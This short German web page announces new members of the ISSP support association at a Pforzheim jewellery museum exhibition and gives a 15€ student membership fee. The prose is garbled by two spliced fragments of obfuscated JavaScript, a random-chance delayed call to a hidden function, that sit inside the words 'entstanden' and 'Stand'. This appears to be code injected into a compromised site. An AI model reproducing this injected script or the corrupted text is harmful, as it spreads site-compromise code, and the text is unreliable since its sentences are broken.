///

Zur Ausstellung im Schmuckmuseum präsentierte der Förderverein ISSP seine neuen Mitglieder. Eine Gruppe Schülerinnen des Berufskollegs für Design, Schmuck und Gerät der Goldschmiedeschule Pforzheim zeigten neue Arbeiten, die im 2. Ausbildungsjahr entstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden sind.

Schüler, Studenten und Auszubildende erhalten die vergünstigte Mitgliedschaft mit einem Jahresbeitrag von 15€ und erhalten die Möglichkeit am Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and der ISSP bei Lust auf Schmuck teilzunehmen.

YouTube

By loading the video, you agree to YouTube's privacy policy.
Learn more

Load video